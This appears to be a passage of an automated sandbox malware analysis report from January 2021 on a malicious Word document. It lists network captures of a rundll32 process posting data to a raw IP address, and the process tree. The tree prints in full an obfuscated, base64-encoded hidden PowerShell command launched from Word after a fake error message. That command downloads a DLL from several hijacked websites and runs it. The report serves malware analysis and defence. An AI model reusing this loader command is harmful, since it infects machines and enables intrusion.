64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                            Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.2249167190.55.186.22980C:\Windows\SysWOW64\rundll32.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 25, 2021 23:14:06.472196102 CET666OUTPOST /efl8dd1i/ HTTP/1.1
                                            DNT: 0
                                            Referer: 190.55.186.229/efl8dd1i/
                                            Content-Type: multipart/form-data; boundary=------------diOigcaeBsfw
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                            Host: 190.55.186.229
                                            Content-Length: 6388
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Jan 25, 2021 23:14:08.237360954 CET674INHTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Mon, 25 Jan 2021 22:14:07 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Vary: Accept-Encoding
                                            Data Raw: 37 38 34 0d 0a 6a 4c b3 01 fb f5 a4 a4 e0 2f 81 26 86 2b 3f c8 3d dc 11 47 54 75 bd 63 8a 27 d3 3a e9 e4 31 f0 40 bd 80 08 9d 25 38 97 21 09 a7 39 31 99 e5 67 01 a6 31 0e 94 7d eb 8f a1 33 7f c5 19 1b c8 56 c4 80 33 b9 71 2c 27 0c b0 ed 99 18 c6 75 0e 73 b5 b9 80 87 2c ba 0f ec 3c 9d 77 3c b4 02 8d c1 cf 2b d5 8a 7d 1b 8e 31 cb be da f7 90 ce c8 80 51 e9 be d1 83 68 f2 50 73 ea 23 c1 98 34 3e 62 c3 03 45 4c 87 fa a5 ab 6c 1f 1a 56 0b cd 7d 10 fd cf 50 01 72 81 c5 79 75 44 8a c2 cb a1 d2 2a ce a6 12 72 d1 fb 83 82 98 16 ea 42 5b 62 28 83 a4 38 30 29 66 ee f5 61 db da 48 8c 76 b7 b2 93 55 4c b6 5e 3d 91 de fa 97 a4 97 e4 27 aa a3 ba af 16 76 14 3a c5 f4 33 8e 3e 43 1d 03 32 76 92 c4 8d 94 8c e5 ef e0 ca b7 7e 49 53 12 f7 7f 99 c5 d1 51 13 97 b4 43 aa a2 bf 24 84 65 ff f5 78 78 f7 1d 5a dd 4a c4 f3 97 fe 6c b0 ab 04 db e0 3c 0c b6 c0 3f c7 ad 95 84 62 2b 4e 57 ca d2 a3 fd f7 82 3b 79 fc 7b f0 35 9a 5b 23 46 e7 20 e3 c1 33 73 1e 01 90 70 98 05 d6 f6 3b f5 61 86 48 c0 cf 60 80 22 28 cf 51 32 1f e9 c5 9a 34 98 42 f1 78 41 c6 93 e8 40 4e 2b 9f 55 67 9b 74 62 fe 84 b8 d5 1a 26 d7 ba f4 69 f9 c8 eb 53 a1 d5 1d c0 3c fa 50 42 bc f0 79 1a fc dc f5 c5 21 bb 32 25 41 64 63 25 5e a0 88 35 24 26 0e 2e 54 32 92 b0 f5 02 90 d9 37 1b e3 5d 5f 91 95 c4 d6 2f 7e 88 4e eb 7b 19 ae 60 4a 9b 24 33 d2 6a 71 6d 49 09 c1 df fa 32 7d 69 05 44 d7 95 3b 17 a9 aa 74 31 dd 65 5b 79 29 49 bb 51 41 3d 54 65 91 75 77 8a 82 3a 58 45 56 8c 97 b9 7d de d9 e9 b1 18 78 44 20 47 4f 4f d5 54 aa 43 c7 65 a6 73 5a 51 ff 99 56 3b 1f d8 77 ce 75 ed 52 ea c7 ab c6 07 c6 08 9e 27 66 3e ec 5a fc a0 4d 37 f2 e2 c9 ac 94 0d 23 33 73 60 4f 0e 68 df dc 3a 84 2f b0 bc be d4 0f b7 f6 fb c7 79 89 9a 67 e3 be 80 ff 7c 96 6f dc 51 be 7e 05 20 d5 fc 2a 33 90 55 0c 7f 51 93 64 cd b6 07 0c 0c 31 2d 62 38 74 3c 3b a2 0c ee 92 61 05 b3 11 dc 05 08 d8 04 41 2a 09 5a fe c5 37 00 49 3c 35 21 0d 82 fd 4d 0c d3 6c e1 97 44 0e a6 01 fb 52 44 4e bb 0d db 9d 07 7b d6 b7 58 e0 50 7f 27 0d 4e fa e2 d5 6b 1e 47 5a a8 45 2e 8d f4 f9 81 1f 5b 91 32 c5 27 eb 79 d3 67 c1 b6 ce c5 9e 03 d4 3b 68 18 69 51 24 5d bb cd 50 07 1f 1e f2 c2 a2 7e 70 e9 f3 20 7f d4 3f dc 91 b8 77 4a f1 17 e5 07 49 1a 1f d9 36 2d 53 2a 5b 35 42 34 e5 bb d4 f1 a2 89 15 fe bb 93 32 d4 88 1e 46 24 76 83 b9 24 52 4c 71 71 b5 81 05 ca 56 42 dd af 32 e3 b3 b2 76 1d c2 3d 71 64 8b c6 7b 63 86 69 ce 47 bd f9 d3 30 71 8c a1 07 1f d3 97 8c 02 5c 40 b9 71 fb 17 b3 48 d0 2a cb 45 84 21 0a db 31 99 11 ec 82 6a bd 6d 00 b6 f9 53 38 45 a2 44 dc 06 ee 1f 9f b5 b1 a2 2e 63 72 7e 1d 9a 4c 55 7b 9a f9 eb ab bd 08 2e 3d d6 75 be 4d 83 65 8a b0 23 e0 7f a0 e5 3f 60 38 b1 10 75 bc 93 6e d3 43 53 32 64 f0 ce c3 5e 60 04 dd 47 fa d3 02 60 a3 db 2e cf b6 29 04 84 d4 71 c3 1b 45 93 a8 4d 85 d0 82 ef 5c 17 8e 87 df 90 3e 9e 73 b5 ed 65 3c 68 b0 ef ea c7 09 6e da ba 0e cc 52 be d1 18 d0 ff 20 96 76 e7 ce 15 3c 70 7f 70 e3 c4 ec 2a 7f 01 73 eb 67 1b 0f cd 08 c2 f2 31 bf 64 8e 17 d5 4f 3b 5c 64 6b cb 1b c1 2c 21 68 0e 60 2f db bf a8 9f 5c d2 36 64 2a 95 2e f5 c9 3d 80 71 52 d9 09 9a ba a8 90 32 52 40 58 8d 12 c7 2a b0 7d 1e 39 f0 f2 fc cc f0 7e 3e 2e 1c 97 9b 0e 95 de 86 ad 21 ac 3f 17 9b 05 65 f3 e2 4e cb f4 e8 d9 2e 85 6e 12 e6 c0 94 89 7a ab 0f f3 69 11 66 d3 70 eb fb e5 20 b6 3a b3 2f 3a ee e6 bf 3d e5 c6 6f 2d 67 0c 35 91 d2 58 ec 5d 22 d7 45 86 6a 47 5c f5 e4 b5 d4 1e 63 5e 9e 88 64 7d 5a f8 fe fd 27 17 b8 fe a0 d9 f9 4c bb f2 e9 fe b4 34 d3 3a 46 21 eb dd a6 44 e4 45 8b f5 a9 72 45 d6 01 00 6f 54 0d ac b5 36 05 78 d6
                                            Data Ascii: 784jL/&+?=GTuc':1@%8!91g1}3V3q,'us,<w<+}1QhPs#4>bELlV}PryuD*rB[b(80)faHvUL^='v:3>C2v~ISQC$exxZJl<?b+NW;y{5[#F 3sp;aH`"(Q24BxA@N+Ugtb&iS<PBy!2%Adc%^5$&.T27]_/~N{`J$3jqmI2}iD;t1e[y)IQA=Teuw:XEV}xD GOOTCesZQV;wuR'f>ZM7#3s`Oh:/yg|oQ~ *3UQd1-b8t<;aA*Z7I<5!MlDRDN{XP'NkGZE.[2'yg;hiQ$]P~p ?wJI6-S*[5B42F$v$RLqqVB2v=qd{ciG0q\@qH*E!1jmS8ED.cr~LU{.=uMe#?`8unCS2d^`G`.)qEM\>se<hnR v<pp*sg1dO;\dk,!h`/\6d*.=qR2R@X*}9~>.!?eN.nzifp :/:=o-g5X]"EjG\c^d}Z'L4:F!DErEoT6x


                                            HTTPS Packets

                                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                            Jan 25, 2021 23:13:52.760840893 CET104.21.88.166443192.168.2.2249166CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IESat Aug 01 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Sun Aug 01 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                            CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                            Code Manipulations

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Start time:23:13:33
                                            Start date:25/01/2021
                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                            Imagebase:0x13f7a0000
                                            File size:1424032 bytes
                                            MD5 hash:95C38D04597050285A18F66039EDB456
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:23:13:35
                                            Start date:25/01/2021
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AGUAbgB0AC8AYgBuADEASQBnACcAKwAnAEQAZQBqAGgALwAhACcAKwAnAG4AJwArACcAcwAgACcAKwAnAHcAdQAgACcAKwAnAGQAJwArACcAYgAnACkAKwAnACAAJwArACgAJwBuAGQAJwArACcAOgAnACkAKwAoACcALwAvAHQAcgBhAHUAbQBmAHIAYQB1AGUAJwArACcAbgAnACsAJwAtAHUAJwArACcAawByAGEAaQBuAGUAJwArACcALgBkACcAKwAnAGUALwAnACkAKwAnAGIAJwArACgAJwBpAG4ALwBKAHkAZQAnACsAJwBTAC8AIQBuAHMAIAAnACsAJwB3AHUAIAAnACsAJwBkACcAKQArACcAYgAnACsAKAAnACAAbgAnACsAJwBkACcAKQArACgAJwBzACcAKwAnADoALwAvAGoAZgBsACcAKwAnAG0AawB0AGcALgB3AHAAYwAnACsAJwBvACcAKwAnAG0AJwArACcAcwB0AGEAJwApACsAJwBnAGkAJwArACcAbgAnACsAJwBnACcAKwAoACcALgBjAG8AbQAnACsAJwAvAHcAcAAnACkAKwAoACcALQBjAG8AJwArACcAbgAnACkAKwAoACcAdABlAG4AJwArACcAdAAvACcAKQArACcAQQAnACsAJwBLACcAKwAnAC8AJwArACcAIQBuACcAKwAoACcAcwAnACsAJwAgAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgAG4AZABzADoALwAvAGwAaQAnACkAKwAoACcAbgBoAGsAaQAnACsAJwBlAG4AbQBhACcAKwAnAHkAdAAnACsAJwBpACcAKQArACgAJwBuAGgAJwArACcALgAnACkAKwAnAHQAJwArACcAYwAnACsAKAAnAHQAZQAnACsAJwBkAHUALgBjAG8AbQAnACsAJwAvACcAKQArACcAdwAnACsAKAAnAHAALQBzAG4AYQAnACsAJwBwAHMAJwArACcAaABvAHQAJwArACcAcwAvAFYAegBKAE0ALwAnACkAKQAuACIAcgBgAEUAcABMAGAAQQBDAEUAIgAoACgAJwBuACcAKwAnAHMAIAAnACsAKAAnAHcAdQAnACsAJwAgAGQAYgAgAG4AZAAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQARgBsADYAYgB3ADAAYwAsACcAdwBkACcAKQBbADMAXQApAC4AIgBzAGAAUABMAEkAdAAiACgAJABIADYANABCACAAKwAgACQATwByAGIAXwBjAGgAMgAgACsAIAAkAFcAOAAyAEIAKQA7ACQASAA5ADEAUwA9ACgAJwBCACcAKwAoACcANQA5ACcAKwAnAFEAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEQAdQAyAGoAbwAxAGoAIABpAG4AIAAkAEQAZQBsADcAdwBmAHkAKQB7AHQAcgB5AHsAKAAuACgAJwBOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAHMAeQBTAFQAZQBNAC4ATgBFAFQALgBXAGUAQgBDAGwAaQBlAE4AdAApAC4AIgBEAE8AYAB3AG4ATABvAEEARABGAGAAaQBsAEUAIgAoACQARAB1ADIAagBvADEAagAsACAAJABRAGYAXwB6ADYANgB0ACkAOwAkAE8AMgAzAFAAPQAoACcAWgA2ACcAKwAnADgAWQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAUQBmAF8AegA2ADYAdAApAC4AIgBsAGAAZQBuAEcAdABoACIAIAAtAGcAZQAgADMAMQAwADYANQApACAAewAuACgAJwByACcAKwAnAHUAJwArACcAbgBkAGwAbAAzADIAJwApACAAJABRAGYAXwB6ADYANgB0ACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAKAAnAFMAdAAnACsAJwByAGkAJwApACsAJwBuAGcAJwApAC4AIgBUAE8AYABzAHQAYABSAEkATgBnACIAKAApADsAJABZADIAOABLAD0AKAAnAEUAJwArACgAJwAxACcAKwAnADQAVgAnACkAKQA7AGIAcgBlAGEAawA7ACQARAA4ADMAUQA9ACgAJwBUACcAKwAoACcAXwAnACsAJwAwAEgAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEMAOQAxAEYAPQAoACcASAAnACsAKAAnADgAOAAnACsAJwBWACcAKQApAA==
                                            Imagebase:0x4a950000
                                            File size:345088 bytes
                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            General

                                            Start time:23:13:36
                                            Start date:25/01/2021
                                            Path:C:\Windows\System32\msg.exe
                                            Wow64 process (32bit):false
                                            Commandline:msg user /v Word experienced an error trying to open the file.
                                            Imagebase:0xff690000
                                            File size:26112 bytes
                                            MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            General

                                            Start time:23:13:36
                                            Start date:25/01/2021
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AGUAbgB0AC8AYgBuADEASQBnACcAKwAnAEQAZQBqAGgALwAhACcAKwAnAG4AJwArACcAcwAgACcAKwAnAHcAdQAgACcAKwAnAGQAJwArACcAYgAnACkAKwAnACAAJwArACgAJwBuAGQAJwArACcAOgAnACkAKwAoACcALwAvAHQAcgBhAHUAbQBmAHIAYQB1AGUAJwArACcAbgAnACsAJwAtAHUAJwArACcAawByAGEAaQBuAGUAJwArACcALgBkACcAKwAnAGUALwAnACkAKwAnAGIAJwArACgAJwBpAG4ALwBKAHkAZQAnACsAJwBTAC8AIQBuAHMAIAAnACsAJwB3AHUAIAAnACsAJwBkACcAKQArACcAYgAnACsAKAAnACAAbgAnACsAJwBkACcAKQArACgAJwBzACcAKwAnADoALwAvAGoAZgBsACcAKwAnAG0AawB0AGcALgB3AHAAYwAnACsAJwBvACcAKwAnAG0AJwArACcAcwB0AGEAJwApACsAJwBnAGkAJwArACcAbgAnACsAJwBnACcAKwAoACcALgBjAG8AbQAnACsAJwAvAHcAcAAnACkAKwAoACcALQBjAG8AJwArACcAbgAnACkAKwAoACcAdABlAG4AJwArACcAdAAvACcAKQArACcAQQAnACsAJwBLACcAKwAnAC8AJwArACcAIQBuACcAKwAoACcAcwAnACsAJwAgAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgAG4AZABzADoALwAvAGwAaQAnACkAKwAoACcAbgBoAGsAaQAnACsAJwBlAG4AbQBhACcAKwAnAHkAdAAnACsAJwBpACcAKQArACgAJwBuAGgAJwArACcALgAnACkAKwAnAHQAJwArACcAYwAnACsAKAAnAHQAZQAnACsAJwBkAHUALgBjAG8AbQAnACsAJwAvACcAKQArACcAdwAnACsAKAAnAHAALQBzAG4AYQAnACsAJwBwAHMAJwArACcAaABvAHQAJwArACcAcwAvAFYAegBKAE0ALwAnACkAKQAuACIAcgBgAEUAcABMAGAAQQBDAEUAIgAoACgAJwBuACcAKwAnAHMAIAAnACsAKAAnAHcAdQAnACsAJwAgAGQAYgAgAG4AZAAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQARgBsADYAYgB3ADAAYwAsACcAdwBkACcAKQBbADMAXQApAC4AIgBzAGAAUABMAEkAdAAiACgAJABIADYANABCACAAKwAgACQATwByAGIAXwBjAGgAMgAgACsAIAAkAFcAOAAyAEIAKQA7ACQASAA5ADEAUwA9ACgAJwBCACcAKwAoACcANQA5ACcAKwAnAFEAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEQAdQAyAGoAbwAxAGoAIABpAG4AIAAkAEQAZQBsADcAdwBmAHkAKQB7AHQAcgB5AHsAKAAuACgAJwBOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAHMAeQBTAFQAZQBNAC4ATgBFAFQALgBXAGUAQgBDAGwAaQBlAE4AdAApAC4AIgBEAE8AYAB3AG4ATABvAEEARABGAGAAaQBsAEUAIgAoACQARAB1ADIAagBvADEAagAsACAAJABRAGYAXwB6ADYANgB0ACkAOwAkAE8AMgAzAFAAPQAoACcAWgA2ACcAKwAnADgAWQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAUQBmAF8AegA2ADYAdAApAC4AIgBsAGAAZQBuAEcAdABoACIAIAAtAGcAZQAgADMAMQAwADYANQApACAAewAuACgAJwByACcAKwAnAHUAJwArACcAbgBkAGwAbAAzADIAJwApA